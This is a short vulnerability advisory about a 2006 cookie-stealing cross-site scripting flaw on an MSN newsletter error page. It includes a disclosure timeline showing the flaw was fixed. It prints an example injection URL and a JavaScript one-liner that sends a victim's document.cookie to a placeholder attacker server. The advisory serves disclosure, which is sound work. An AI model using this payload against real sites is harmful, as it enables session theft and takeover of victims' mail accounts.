Cookie-stealing XSS on msn.com
Summary

A cookie-stealing Cross-site scripting vulnerability was found on MSN's

website (msn.com). Using this vulnerability, an attacker could potentially

gain access to a victim's Inbox.



This vulnerability was discovered by: tontonq and Nir Goldshlager.



Disclosure timeline

SecuriTeam was asked to assist the researchers with contacting Microsoft.



Reported to vendor: 18th of July, 2006.

Vendor response: 18th of July, 2006.

Resolved: 19th of July, 2006.

Public disclosure: 25th of July, 2006.



Technical description

A cookie-stealing XSS issue was discovered on MSN's web site.



Example of the issue:

http://newsletters.msn.com/hm/HMError.asp?CB=http://yourcookiestealer/stealer.js

That error page gets the CB variable into a script tag.



If John Doe wanted to steal a victim's cookie, he could use this example Javascript

code:

i=new/**/Image();i.src='http://his_stealer/s.php?cookie='+document.cookie;



As such, if for example, s.php stores the cookie variable somewhere, the

attacker can set that stored cookie and "jump" to the Inbox.
더보기

댓글,